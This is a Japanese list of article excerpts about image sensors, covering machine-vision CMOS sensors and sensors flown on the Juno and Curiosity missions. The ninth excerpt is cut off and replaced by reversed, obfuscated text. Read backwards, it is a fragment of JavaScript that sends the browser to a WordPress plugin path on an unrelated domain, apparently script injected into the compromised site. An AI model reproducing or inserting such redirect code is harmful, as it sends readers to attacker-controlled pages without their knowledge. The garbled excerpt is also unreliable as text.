『イメージセンサ』の記事一覧 : 10件

▲ams アプリケーションエンジニア Pieterjan Daelemans はじめに 今日、マシンビジョンの世界ではグローバルシャッタCMOSイメージセンサが浸透しています。このセンサはCCDセンサやローリングシャッタ...

グローバルシャッタCMOSイメージセンサであるPYTHONファミリーは、わずか2年前の発売以来、マシンビジョン、動作解析、高度道路交通システム(ITS)などの産業用アプリケーションにおいて、短期間に高速で高性能なイメージ...

昨年、 KAE-02150イメージセンサ(オン・セミコンダクターのインターライン転送型 EMCCD 技術を活用した最初のデバイス)は、Electronics Products誌の2015年の今年の優秀製品賞およびVisi...

火星や木星などの惑星探査ミッションに対する興味が最近高まっていることを考えると、人類が地球以外に降り立った場所が月面だけであることを簡単に忘れがちです。 人類が月に最後の足跡を残してから約45年経った今、地球の最も近い隣...

NASAのジュノー探査機は、7月4日に5年に亘る旅を終え、地球から28億キロ(17億マイル)離れた木星の周回軌道に入り、巨大なガス惑星の起源と進化をより深く理解するためのミッションを開始しました。 6日後、探査機のジュノ...

NASAの木星探査機ジュノーは、2011年8月の打ち上げ後、地球から木星まで約28億キロメートル(17億マイル)の長距離を旅しました。 そして、5年間に亘り太陽系の内側を巡航し、ようやく米国時間7月4日に木星に到達しまし...

オン・セミコンダクター製イメージセンサは、地球外惑星への宇宙ミッションに使用されていますが、地球を周回する商用衛星のホームに近いところで使用されていても驚くことではありません。 これらの衛星は地球軌道を離れる必要がないの...

以前ブログで述べたように、火星探査機キュリオシティは、火星の地質学的歴史をよりよく理解し、火星の風景の見事なパノラマ(そして、素晴らしい自撮り写真)を撮影するために、科学用カメラにKAI-2020イメージセンサを使用して...

2011年11月、Mars Science Laboratoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemuc...

今やいたるところでイメージング技術が採用されているように思えます。 当初はハンドヘルド機器やスマートフォンで使われていましたが、やがて自動車、医療機器、交通システム、ドローン、防犯設備、工業用検査システムなどの分野にまで...